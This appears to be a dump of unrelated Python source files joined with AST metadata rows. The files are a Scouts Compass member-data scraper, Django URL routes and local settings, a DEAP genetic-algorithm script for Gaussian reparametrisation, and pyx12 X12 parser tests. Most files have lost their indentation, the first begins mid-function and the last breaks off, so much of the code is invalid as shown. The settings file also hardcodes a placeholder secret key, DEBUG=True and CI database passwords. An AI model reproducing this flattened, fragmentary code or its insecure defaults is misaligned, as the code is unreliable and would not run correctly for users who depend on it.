# info["ct"] = parts[3:] # TODO what is this? From CompassRead.php
info["wood_badge_number"] = child_nodes[5].get("id", "").removeprefix("WB_") or None
training_roles[info["role_number"]] = info
# Handle GDPR:
# Get latest GDPR date
training_ogl = {
"GDPR": dict(
name="GDPR",
completed_date=next(
reversed(
sorted(mod["validated_date"] for plp in training_plps.values() for mod in plp if mod["code"] == "GDPR")
),
None,
),
),
}
for ongoing_learning in tree.xpath("//tr[@data-ng_code]"):
cell_text = {c.get("id", "<None>").split("_")[0]: c.text_content() for c in ongoing_learning}
training_ogl[ongoing_learning.get("data-ng_code")] = dict(
name=cell_text.get("<None>"),
completed_date=parse(cell_text.get("tdLastComplete")),
renewal_date=parse(cell_text.get("tdRenewal")),
)
# TODO missing data-pk from list(cell)[0].tag == "input", and module names/codes. Are these important?
if ongoing_only:
return schema.MemberMOGLList.parse_obj(training_ogl) if self.validate else training_ogl
training_data = {
"roles": training_roles,
"plps": training_plps,
"mandatory": training_ogl,
}
return schema.MemberTrainingTab.parse_obj(training_data) if self.validate else training_data
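    # Note: calling get_training_tab(membership_num, ongoing_only=True) short-circuits and
    # returns only the mandatory ongoing learning (GDPR etc.) summary instead of the full
    # roles/plps/mandatory structure.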
def get_permits_tab(self, membership_num: int) -> Union[schema.MemberPermitsList, list]:
"""Returns data from Permits tab for a given member.
If a permit has been revoked, the expires value is None and the status is PERM_REV
Args:
membership_num: Membership Number to use
Returns:
A list of dicts mapping keys to the corresponding data from the
permits tab.
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
response = self._get_member_profile_tab(membership_num, "Permits")
tree = html.fromstring(response)
# Get rows with permit content
rows = tree.xpath('//table[@id="tbl_p4_permits"]//tr[@class="msTR msTRPERM"]')
permits = []
for row in rows:
permit = dict(membership_number=membership_num)
child_nodes = list(row)
permit["permit_type"] = child_nodes[1].text_content()
permit["category"] = child_nodes[2].text_content()
permit["type"] = child_nodes[3].text_content()
permit["restrictions"] = child_nodes[4].text_content()
expires = child_nodes[5].text_content()
permit["expires"] = parse(expires) if expires != "Revoked" else None
permit["status"] = child_nodes[5].get("class")
permits.append(permit)
if self.validate:
return schema.MemberPermitsList.parse_obj(permits)
else:
return permits
# See getAppointment in PGS\Needle
def get_roles_detail(
self, role_number: int, response: Union[str, requests.Response] = None
) -> Union[schema.MemberRolePopup, dict]:
"""Returns detailed data from a given role number.
Args:
role_number: Role Number to use
response: Pre-generated response to use
Returns:
A dicts mapping keys to the corresponding data from the
role detail data.
E.g.:
{'hierarchy': {'organisation': 'The Scout Association',
'country': '...',
'region': '...',
'county': '...',
'district': '...',
'group': '...',
'section': '...'},
'details': {'role_number': ...,
'organisation_level': '...',
'birth_date': datetime.datetime(...),
'membership_number': ...,
'name': '...',
'role_title': '...',
'role_start': datetime.datetime(...),
'role_status': '...',
'line_manager_number': ...,
'line_manager': '...',
'ce_check': datetime.datetime(...),
'disclosure_check': '...',
'references': '...',
'appointment_panel_approval': '...',
'commissioner_approval': '...',
'committee_approval': '...'},
'getting_started': {...: {'name': '...',
'validated': datetime.datetime(...),
'validated_by': '...'},
...
}}
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
# pylint: disable=too-many-locals,too-many-statements
renamed_levels = {
"County / Area / Scottish Region / Overseas Branch": "County",
}
renamed_modules = {
1: "module_01",
"TRST": "trustee_intro",
2: "module_02",
3: "module_03",
4: "module_04",
"GDPR": "GDPR",
}
unset_vals = {"--- Not Selected ---", "--- No Items Available ---", "--- No Line Manager ---"}
module_names = {
"Essential Information": "M01",
"Trustee Introduction": "TRST",
"PersonalLearningPlan": "M02",
"Tools for the Role (Section Leaders)": "M03",
"Tools for the Role (Managers and Supporters)": "M04",
"General Data Protection Regulations": "GDPR",
}
references_codes = {
"NC": "Not Complete",
"NR": "Not Required",
"RR": "References Requested",
"S": "References Satisfactory",
"U": "References Unsatisfactory",
}
start_time = time.time()
if response is None:
response = self._get(f"{Settings.base_url}/Popups/Profile/AssignNewRole.aspx?VIEW={role_number}")
logger.debug(f"Getting details for role number: {role_number}. Request in {(time.time() - start_time):.2f}s")
post_response_time = time.time()
if isinstance(response, (str, bytes)):
tree = html.fromstring(response)
else:
tree = html.fromstring(response.content)
form = tree.forms[0]
if form.action == "./ScoutsPortal.aspx?Invalid=Access":
raise PermissionError(f"You do not have permission to the details of role {role_number}")
member_string = form.fields.get("ctl00$workarea$txt_p1_membername")
ref_code = form.fields.get("ctl00$workarea$cbo_p2_referee_status")
role_details = dict()
# Approval and Role details
role_details["role_number"] = role_number
role_details["organisation_level"] = form.fields.get("ctl00$workarea$cbo_p1_level")
role_details["birth_date"] = parse(form.inputs["ctl00$workarea$txt_p1_membername"].get("data-dob"))
role_details["membership_number"] = int(form.fields.get("ctl00$workarea$txt_p1_memberno"))
role_details["name"] = member_string.split(" ", maxsplit=1)[1] # TODO does this make sense - should name be in every role??
role_details["role_title"] = form.fields.get("ctl00$workarea$txt_p1_alt_title")
role_details["role_start"] = parse(form.fields.get("ctl00$workarea$txt_p1_startdate"))
# Role Status
role_details["role_status"] = form.fields.get("ctl00$workarea$txt_p2_status")
# Line Manager
line_manager_el = next((op for op in form.inputs["ctl00$workarea$cbo_p2_linemaneger"] if op.get("selected")), None)
role_details["line_manager_number"] = maybe_int(line_manager_el.get("value")) if line_manager_el is not None else None
role_details["line_manager"] = line_manager_el.text.strip() if line_manager_el is not None else None
# Review Date
role_details["review_date"] = parse(form.fields.get("ctl00$workarea$txt_p2_review"))
# CE (Confidential Enquiry) Check # TODO if CE check date != current date then is valid
role_details["ce_check"] = parse(form.fields.get("ctl00$workarea$txt_p2_cecheck"))
# Disclosure Check
disclosure_with_date = form.fields.get("ctl00$workarea$txt_p2_disclosure")
if disclosure_with_date.startswith("Disclosure Issued : "):
disclosure_date = parse(disclosure_with_date.removeprefix("Disclosure Issued : "))
disclosure_check = "Disclosure Issued"
else:
disclosure_date = None
disclosure_check = disclosure_with_date
role_details["disclosure_check"] = disclosure_check # TODO extract date
role_details["disclosure_date"] = disclosure_date # TODO extract date
# References
role_details["references"] = references_codes.get(ref_code, ref_code)
approval_values = {}
for row in tree.xpath("//tr[@class='trProp']"):
select = row[1][0]
code = select.get("data-app_code")
approval_values[code] = select.get("data-db")
# select.get("title") gives title text, but this is not useful as it does not reflect latest changes,
# but only who added the role to Compass.
# Appointment Panel Approval
role_details["appointment_panel_approval"] = approval_values.get("ROLPRP|AACA")
# Commissioner Approval
role_details["commissioner_approval"] = approval_values.get("ROLPRP|CAPR")
# Committee Approval
role_details["committee_approval"] = approval_values.get("ROLPRP|CCA")
if role_details["line_manager_number"] in unset_vals:
role_details["line_manager_number"] = None
# Filter null values
role_details = {k: v for k, v in role_details.items() if v is not None}
# Getting Started
modules_output = {}
getting_started_modules = tree.xpath("//tr[@class='trTrain trTrainData']")
# Get all training modules and then extract the required modules to a dictionary
for module in getting_started_modules:
module_name = module[0][0].text.strip()
if module_name in module_names:
info = {
# "name": module_names[module_name], # short_name
"validated": parse(module[2][0].value), # Save module validation date
"validated_by": module[1][1].value or None, # Save who validated the module
}
mod_code = cast(module[2][0].get("data-ng_value")) # int or str
modules_output[renamed_modules[mod_code]] = info
# Get all levels of the org hierarchy and select those that will have information:
# Get all inputs with location data
org_levels = [v for k, v in sorted(dict(form.inputs).items()) if "ctl00$workarea$cbo_p1_location" in k]
# TODO
all_locations = {row.get("title"): row.findtext("./option") for row in org_levels}
clipped_locations = {
renamed_levels.get(key, key).lower(): value for key, value in all_locations.items() if value not in unset_vals
}
logger.debug(
f"Processed details for role number: {role_number}. "
f"Compass: {(post_response_time - start_time):.3f}s; Processing: {(time.time() - post_response_time):.4f}s"
)
# TODO data-ng_id?, data-rtrn_id?
full_details = {
"hierarchy": clipped_locations,
"details": role_details,
"getting_started": modules_output,
}
if self.validate:
return schema.MemberRolePopup.parse_obj(full_details)
else:
return full_details
| [((139, 15, 139, 40), 'lxml.html.fromstring', 'html.fromstring', ({(139, 31, 139, 39): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((235, 8, 235, 78), 'compass.core.logger.logger.debug', 'logger.debug', ({(235, 21, 235, 77): 'f"""getting roles tab for member number: {membership_num}"""'}, {}), "(f'getting roles tab for member number: {membership_num}')", False, 'from compass.core.logger import logger\n'), ((237, 15, 237, 40), 'lxml.html.fromstring', 'html.fromstring', ({(237, 31, 237, 39): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((340, 15, 340, 40), 'lxml.html.fromstring', 'html.fromstring', ({(340, 31, 340, 39): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((481, 15, 481, 40), 'lxml.html.fromstring', 'html.fromstring', ({(481, 31, 481, 39): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((586, 21, 586, 32), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((591, 29, 591, 40), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((170, 31, 170, 51), 'compass.core.utility.parse', 'parse', ({(170, 37, 170, 50): 'join_date_str'}, {}), '(join_date_str)', False, 'from compass.core.utility import parse\n'), ((192, 19, 192, 58), 'compass.core.schemas.member.MemberDetails.parse_obj', 'schema.MemberDetails.parse_obj', ({(192, 50, 192, 57): 'details'}, {}), '(details)', True, 'from compass.core.schemas import member as schema\n'), ((287, 19, 287, 63), 'compass.core.schemas.member.MemberRolesDict.parse_obj', 'schema.MemberRolesDict.parse_obj', ({(287, 52, 287, 62): 'roles_data'}, {}), '(roles_data)', True, 'from compass.core.schemas import member as schema\n'), ((460, 15, 460, 64), 'compass.core.schemas.member.MemberTrainingTab.parse_obj', 'schema.MemberTrainingTab.parse_obj', ({(460, 50, 460, 63): 'training_data'}, {}), '(training_data)', True, 'from compass.core.schemas import member as schema\n'), ((501, 19, 501, 62), 'compass.core.schemas.member.MemberPermitsList.parse_obj', 'schema.MemberPermitsList.parse_obj', ({(501, 54, 501, 61): 'permits'}, {}), '(permits)', True, 'from compass.core.schemas import member as schema\n'), ((593, 19, 593, 44), 'lxml.html.fromstring', 'html.fromstring', ({(593, 35, 593, 43): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((595, 19, 595, 52), 'lxml.html.fromstring', 'html.fromstring', ({(595, 35, 595, 51): 'response.content'}, {}), '(response.content)', False, 'from lxml import html\n'), ((693, 19, 693, 65), 'compass.core.schemas.member.MemberRolePopup.parse_obj', 'schema.MemberRolePopup.parse_obj', ({(693, 52, 693, 64): 'full_details'}, {}), '(full_details)', True, 'from compass.core.schemas import member as schema\n'), ((452, 19, 452, 64), 'compass.core.schemas.member.MemberMOGLList.parse_obj', 'schema.MemberMOGLList.parse_obj', ({(452, 51, 452, 63): 'training_ogl'}, {}), '(training_ogl)', True, 'from compass.core.schemas import member as schema\n'), ((495, 32, 495, 46), 'compass.core.utility.parse', 'parse', ({(495, 38, 495, 45): 'expires'}, {}), '(expires)', False, 'from compass.core.utility import parse\n'), ((87, 44, 87, 78), 'typing.get_args', 'get_args', ({(87, 53, 87, 77): 'MEMBER_PROFILE_TAB_TYPES'}, {}), '(MEMBER_PROFILE_TAB_TYPES)', False, 'from typing import get_args, Literal, TYPE_CHECKING, Union\n'), ((413, 40, 413, 75), 'compass.core.utility.maybe_int', 'maybe_int', ({(413, 50, 413, 74): 'training_advisor_data[0]'}, {}), '(training_advisor_data[0])', False, 'from compass.core.utility import maybe_int\n'), 
((666, 33, 666, 58), 'compass.core.utility.parse', 'parse', ({(666, 39, 666, 57): 'module[2][0].value'}, {}), '(module[2][0].value)', False, 'from compass.core.utility import parse\n'), ((379, 69, 379, 100), 'compass.core.utility.maybe_int', 'maybe_int', ({(379, 79, 379, 99): 'validated_by_data[0]'}, {}), '(validated_by_data[0])', False, 'from compass.core.utility import maybe_int\n'), ((683, 14, 683, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((589, 27, 589, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
Quran-Tafseer/tafseer_api | quran_text/urls.py | 49eede15a6e50812a4bab1e0e1e38069fcb0da4d | from django.urls import path
from . import views
urlpatterns = [
path('',
view=views.SuraListView.as_view(), name='sura-list'),
path('<int:sura_num>/<int:number>/',
view=views.AyahTextView.as_view(), name='ayah-detail'),
path('<int:sura_num>/<int:number>',
view=views.AyahTextView.as_view()),
]
| [] |
IanSeng/CMPUT404_PROJECT | konnection/settings/local.py | 80acd2c57de4b091e0e66ad9f5f2df17801bf09e | from konnection.settings.base import *
from pathlib import Path
import os
import dotenv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent.parent
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
SECRET_KEY = 'temporaryKey'
# For tests
# https://stackoverflow.com/a/35224204
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = ['--with-spec', '--spec-color']
# Adding secrets to env file
# From StackOverflow https://stackoverflow.com/a/61437799
# From Zack Plauché https://stackoverflow.com/users/10415970/zack-plauch%c3%a9
dotenv_file = os.path.join(BASE_DIR, ".env")
if os.path.isfile(dotenv_file):
dotenv.load_dotenv(dotenv_file)
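# Example .env contents read above (placeholder values; keep the real file out of version control):
#   DB_USER=myprojectuser
#   DB_PASSWORD=change-me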
# Connecting PostgreSQL to Django
# From https://www.digitalocean.com/community/tutorials/how-to-use-postgresql-with-your-django-application-on-ubuntu-14-04
# From Digital Ocean
# From Justin Ellingwood https://www.digitalocean.com/community/users/jellingwood
if os.getenv('GITHUB_WORKFLOW'):
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'github-actions',
'USER': 'postgres',
'PASSWORD': 'postgres',
'HOST': 'localhost',
'PORT': '5432'
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'myproject',
'USER': os.environ['DB_USER'],
'PASSWORD': os.environ['DB_PASSWORD'],
'HOST': 'localhost',
'PORT': '',
}
} | [((23, 14, 23, 44), 'os.path.join', 'os.path.join', ({(23, 27, 23, 35): 'BASE_DIR', (23, 37, 23, 43): '""".env"""'}, {}), "(BASE_DIR, '.env')", False, 'import os\n'), ((24, 3, 24, 30), 'os.path.isfile', 'os.path.isfile', ({(24, 18, 24, 29): 'dotenv_file'}, {}), '(dotenv_file)', False, 'import os\n'), ((31, 3, 31, 31), 'os.getenv', 'os.getenv', ({(31, 13, 31, 30): '"""GITHUB_WORKFLOW"""'}, {}), "('GITHUB_WORKFLOW')", False, 'import os\n'), ((25, 4, 25, 35), 'dotenv.load_dotenv', 'dotenv.load_dotenv', ({(25, 23, 25, 34): 'dotenv_file'}, {}), '(dotenv_file)', False, 'import dotenv\n'), ((8, 11, 8, 25), 'pathlib.Path', 'Path', ({(8, 16, 8, 24): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n')] |
PotentialParadox/PyReparm | main.py | 70062e351eebacb9c6cb3dc0262e97256c52be3d | import random
from evaluation import Evaluator
from generator import generator
from mutate import mutateset
from deap import base
from deap import creator
from deap import tools
from parameter_group import ParameterGroup
import gaussian_output
from analysis import Analysis
from gaussian_input import GaussianInput
from gaussian import gaussian_single
from header import Header
from reparm_data import ReparmData
from genesis import Genesis
import numpy as np
from scipy.optimize import minimize
from copy import deepcopy
from sklearn.cross_validation import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn import svm
from sklearn.linear_model import RidgeCV
from sklearn.ensemble import RandomForestRegressor
#############################################
# BEGIN USER INPUT
#############################################
fin = open("reparm.in", 'r')
file = fin.read()
reparm_data = ReparmData(file)
if reparm_data.reparm_input.should_continue:
reparm_data.load()
else:
Genesis(reparm_data=reparm_data)
reparm_data.save()
############################################
# END USER INPUT
############################################
#############################################
# BEGIN USER INPUT
#############################################
# Number of Generation
NGEN = reparm_data.reparm_input.number_generations
# PopulationSize
PSIZE = reparm_data.reparm_input.population_size
# Crossover Probability
CXPB = reparm_data.reparm_input.crossover_probability
# Mutation Probability
# How likely and individual will be mutated
MUTPB = reparm_data.reparm_input.mutation_probability
# Mutation Rate
# How likely a member of an individual will be mutated
MUTR = reparm_data.reparm_input.mutation_rate
# Crowding Factor
CWD = reparm_data.reparm_input.crowding_factor
# Mutation Perturbation
MUTPT = reparm_data.reparm_input.mutation_perturbation
# Initial Perturbation
IMUTPT = 0.05
# Initial List of parameters
IL = []
for i in range(0, len(reparm_data.best_am1_individual.inputs[0].parameters[0].p_floats), 4):
IL.append(reparm_data.best_am1_individual.inputs[0].parameters[0].p_floats[i])
# The evaluator (fitness, cost) function
eval = Evaluator(reparm_data=reparm_data)
if reparm_data.best_fitness is None:
reparm_data.best_fitness = list(eval.eval(IL))
reparm_data.original_fitness = deepcopy(reparm_data.best_fitness)
else:
reparm_data.best_fitness = list(eval.eval(IL))
print("original_fitness", reparm_data.original_fitness)
print("starting at", reparm_data.best_fitness)
#############################################
# END USER INPUT
#############################################
#############################################
# BEGIN DEAP SETUP
#############################################
creator.create("FitnessMax", base.Fitness, weights=(-1.0, 0, 0))
creator.create("ParamSet", list, fitness=creator.FitnessMax, best=None)
toolbox = base.Toolbox()
toolbox.register("individual", generator, IL, IMUTPT)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
toolbox.register("mate", tools.cxSimulatedBinary)
toolbox.register("mutate", mutateset, pert=MUTPT, chance=MUTR)
toolbox.register("select", tools.selTournament, tournsize=3)
toolbox.register("evaluate", eval.eval)
pop = toolbox.population(n=PSIZE)
#############################################
# END DEAP SETUP
#############################################
#############################################
# BEGIN GENETIC ALGORITHM
#############################################
for g in range(NGEN):
print("Starting gen:", g)
offspring = toolbox.select(pop, len(pop))
offspring = list(map(toolbox.clone, offspring))
for child1, child2 in zip(offspring[::2], offspring[1::2]):
if random.random() < CXPB:
toolbox.mate(child1, child2, CWD)
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
if random.random() < MUTPB:
toolbox.mutate(mutant)
del mutant.fitness.values
invalid_ind = [ind for ind in offspring if not ind.fitness.valid]
fitnesses = []
for i in invalid_ind:
try:
fitness = toolbox.evaluate(i)
fitnesses.append(fitness)
reparm_data.observations.append(list(i))
i.fitness.values = fitness
if not reparm_data.best_fitness or fitness[0] < reparm_data.best_fitness[0]:
print("Previous Best", reparm_data.best_fitness)
reparm_data.best_fitness = list(fitness)
reparm_data.best_am1_individual.set_pfloats(i)
print("NewBest Found:", reparm_data.best_fitness)
except TypeError:
fitnesses.append(None)
reparm_data.save()
pop[:] = offspring
#############################################
# End Genetic Algorithm
#############################################
#############################################
# Begin Particle Simulation
#############################################
# for g in range(NGEN):
# for part in pop:
# part.fitness.values = toolbox.evaluate(part)
# if not part.best or part.best.fitness < part.fitness:
# part.best = creator.ParamSet(part)
# part.best.fitness.values = part.fitness.values
# if not best or best.fitness < part.fitness:
# best = creator.ParamSet(part)
# best.fitness.values = part.fitness.values
# for part in pop:
# toolbox.mutate(part)
# print(best, "with fitness", best.fitness)
#############################################
# End Particle Simulation
#############################################
#############################################
# Begin Print Out
#############################################
gin_best = reparm_data.best_am1_individual.inputs[0]
s_opt_header = "#P AM1(Input,Print) opt\n\nAM1\n"
opt_header = Header(s_opt_header)
gin_opt = GaussianInput(header=opt_header,
coordinates=gin_best.coordinates[0],
parameters=gin_best.parameters[0])
fout = open("reparm_best_opt.com", 'w')
fout.write(gin_opt.str())
fout.close()
try:
gout = gaussian_single(gin_opt.str())
fout = open("reparm_best_opt.log", 'w')
fout.write(gout)
fout.close()
except TypeError:
print("Could not get output file from input,"
"most likely, optimization failed to converge")
#############################################
# End Print Out
#############################################
#############################################
# Begin ScikitLearn
#############################################
# # Preprocessor
# targets = np.array(reparm_data.targets)
# X = np.array(reparm_data.observations)
# y = targets[:, 0] # 0, 1, 2 for total, energy, and dipole
# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)
# stdsc = StandardScaler()
# X_train_std = stdsc.fit_transform(X_train)
# X_test_std = stdsc.transform(X_test)
#
# # Training
# clf = svm.SVR(C=1.3, kernel='rbf')
# # clf = RandomForestRegressor(n_estimators=20)
# clf.fit(X_train, y_train)
# print("Using {} samples with fitness score {}".format(len(y), clf.score(X_test, y_test)))
#
# initial_guess = np.array(IL)
# fun = lambda x: clf.predict(stdsc.transform(x.reshape(1, -1)))
# print("Predicting best parameters")
# min_params = (minimize(fun, initial_guess)).x
# stdsc.inverse_transform(min_params)
# params = min_params.tolist()
# skl_best = deepcopy(reparm_data.best_am1_individual)
# skl_best.set_pfloats(params)
# open("skl_best.com", 'w').write(skl_best.inputs[0].str())
# skl_fitness = eval.eval(params)
# if skl_fitness:
# print("skl_fitness:", skl_fitness)
#############################################
# End ScikitLearn
#############################################
#############################################
# Begin Analysis
#############################################
anal = Analysis(reparm_data)
anal.trithiophene()
#############################################
# End Analysis
#############################################
| [((30, 14, 30, 30), 'reparm_data.ReparmData', 'ReparmData', ({(30, 25, 30, 29): 'file'}, {}), '(file)', False, 'from reparm_data import ReparmData\n'), ((67, 7, 67, 41), 'evaluation.Evaluator', 'Evaluator', (), '', False, 'from evaluation import Evaluator\n'), ((86, 0, 86, 64), 'deap.creator.create', 'creator.create', (), '', False, 'from deap import creator\n'), ((87, 0, 87, 71), 'deap.creator.create', 'creator.create', (), '', False, 'from deap import creator\n'), ((89, 10, 89, 24), 'deap.base.Toolbox', 'base.Toolbox', ({}, {}), '()', False, 'from deap import base\n'), ((164, 13, 164, 33), 'header.Header', 'Header', ({(164, 20, 164, 32): 's_opt_header'}, {}), '(s_opt_header)', False, 'from header import Header\n'), ((165, 10, 167, 58), 'gaussian_input.GaussianInput', 'GaussianInput', (), '', False, 'from gaussian_input import GaussianInput\n'), ((222, 7, 222, 28), 'analysis.Analysis', 'Analysis', ({(222, 16, 222, 27): 'reparm_data'}, {}), '(reparm_data)', False, 'from analysis import Analysis\n'), ((34, 4, 34, 36), 'genesis.Genesis', 'Genesis', (), '', False, 'from genesis import Genesis\n'), ((70, 35, 70, 69), 'copy.deepcopy', 'deepcopy', ({(70, 44, 70, 68): 'reparm_data.best_fitness'}, {}), '(reparm_data.best_fitness)', False, 'from copy import deepcopy\n'), ((111, 11, 111, 26), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n'), ((116, 11, 116, 26), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n')] |
arenius/pyx12 | pyx12/test/test_x12context.py | 537493deaa0b8e18a3fa72eb1b3eeae9ef043b11 | import unittest
#import tempfile
# Python 2/3 compatibility for StringIO
try:
    from StringIO import StringIO
except ImportError:
    from io import StringIO
import pyx12.error_handler
from pyx12.errors import EngineError # , X12PathError
import pyx12.x12context
import pyx12.params
from pyx12.test.x12testdata import datafiles
class X12fileTestCase(unittest.TestCase):
def setUp(self):
self.param = pyx12.params.params()
def _makeFd(self, x12str=None):
try:
if x12str:
fd = StringIO(x12str)
else:
fd = StringIO()
except:
if x12str:
fd = StringIO(x12str, encoding='ascii')
else:
fd = StringIO(encoding='ascii')
fd.seek(0)
return fd
class Delimiters(X12fileTestCase):
def test_arbitrary_delimiters(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&HC&ZZ000&ZZ001&20030828&1128&17&X&004010X098A1+\n'
str1 += 'ST&837&11280001+\n'
str1 += 'REF&87&004010X098A1+\n'
str1 += 'SE&3&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
fd = self._makeFd(str1)
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments():
pass
self.assertEqual(src.subele_term, '!')
self.assertEqual(src.ele_term, '&')
self.assertEqual(src.seg_term, '+')
def test_binary_delimiters(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&HC&ZZ000&ZZ001&20030828&1128&17&X&004010X098A1+\n'
str1 += 'ST&837&11280001+\n'
str1 += 'REF&87&004010X098A1+\n'
str1 += 'SE&3&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
str1 = str1.replace('&', chr(0x1C))
str1 = str1.replace('+', chr(0x1D))
str1 = str1.replace('!', chr(0x1E))
fd = self._makeFd(str1)
errors = []
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments():
pass
self.assertEqual(src.subele_term, chr(0x1E))
self.assertEqual(src.ele_term, chr(0x1C))
self.assertEqual(src.seg_term, chr(0x1D))
class TreeGetValue(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_get_line_numbers_2200(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(self.loop2300.seg_count, 19)
self.assertEqual(self.loop2300.cur_line_number, 21)
for seg in loop2400.select('CLM'):
self.assertEqual(seg.seg_count, 25)
self.assertEqual(seg.cur_line_number, 2271)
break
def test_get_line_numbers_2400(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.seg_count, 35)
self.assertEqual(loop2400.cur_line_number, 37)
for svc in loop2400.select('SV1'):
self.assertEqual(svc.seg_count, 36)
self.assertEqual(svc.cur_line_number, 38)
break
def test_get_seg_value(self):
self.assertEqual(self.loop2300.get_value('CLM02'), '21')
self.assertEqual(self.loop2300.get_value('CLM99'), None)
def test_get_seg_value_fail_no_element_index(self):
self.assertRaises(IndexError, self.loop2300.get_value, 'CLM')
def test_get_parent_value(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('../CLM01'), '3215338')
self.assertEqual(loop2400.get_value('../2310B/NM109'), '222185735')
def test_get_seg_value_idx(self):
for clm in self.loop2300.select('CLM'):
self.assertEqual(clm.get_value('02'), '21')
self.assertEqual(clm.get_value('05-3'), '1')
def test_get_first_value(self):
self.assertEqual(self.loop2300.get_value('2400/SV101'), 'HC:H2015:TT')
self.assertEqual(self.loop2300.get_value('2400/SV101-2'), 'H2015')
self.assertEqual(self.loop2300.get_value('2400/REF[6R]02'), '1057296')
self.assertEqual(self.loop2300.get_value('2400/2430/SVD02'), '21')
self.assertEqual(self.loop2300.get_value('2400/AMT[AAE]02'), '21')
def test_get_first_value_2400(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('AMT[AAE]02'), '21')
self.assertEqual(loop2400.get_value('2430/AMT[AAE]02'), None)
def test_get_no_value(self):
self.assertEqual(self.loop2300.get_value('2400/SV199'), None)
self.assertEqual(self.loop2300.get_value('2400'), None)
def test_get_parent_no_value(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('../2310E/NM109'), None)
def test_get_specific_qual(self):
self.assertEqual(self.loop2300.get_value('2400/REF[6R]02'), '1057296')
self.assertEqual(self.loop2300.get_value('2400/REF[G1]02'), None)
self.assertEqual(self.loop2300.get_value('2400/REF[XX]02'), None)
class TreeSetValue(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_set_seg_value(self):
self.loop2300.set_value('CLM02', '50')
self.assertEqual(self.loop2300.get_value('CLM02'), '50')
def test_set_first_value_2400(self):
loop2400 = self.loop2300.first('2400')
loop2400.set_value('AMT[AAE]02', '25')
self.assertEqual(loop2400.get_value('AMT[AAE]02'), '25')
class TreeSelect(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
self.param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
#def test_select_loop_and_parent(self):
# loop2400 = self.loop2300.first('2400')
# assert loop2400.id == '2400', 'Not in 2400'
# ct = 0
# newtree = loop2400.parent
# for newtree in loop2400.select('../'):
# self.assertEqual(newtree.id, '2300')
# ct += 1
# self.assertEqual(ct, 1)
def test_select_loops(self):
ct = 0
for newtree in self.loop2300.select('2400'):
self.assertEqual(newtree.id, '2400')
ct += 1
self.assertEqual(ct, 2)
def test_select_seg(self):
ct = 0
for newtree in self.loop2300.select('2400/SV1'):
self.assertEqual(newtree.id, 'SV1')
self.assertEqual(newtree.get_value('SV102'), '21')
ct += 1
self.assertEqual(ct, 2)
def test_select_parent_seg(self):
loop2400 = self.loop2300.first('2400')
assert loop2400.id == '2400', 'Not in 2400'
ct = 0
for newtree in loop2400.select('../CLM'):
self.assertEqual(newtree.id, 'CLM')
self.assertEqual(newtree.get_value('CLM01'), '3215338')
ct += 1
self.assertEqual(ct, 1)
def test_select_from_st(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
ct = 0
for datatree in src.iter_segments('ST_LOOP'):
if datatree.id == 'ST_LOOP':
for claim in datatree.select('DETAIL/2000/2100'):
self.assertEqual(claim.id, '2100')
ct += 1
self.assertEqual(
ct, 3, 'Found %i 2100 loops. Should have %i' % (ct, 3))
def test_select_from_gs(self):
fd = self._makeFd(datafiles['simple_837i']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
ct = 0
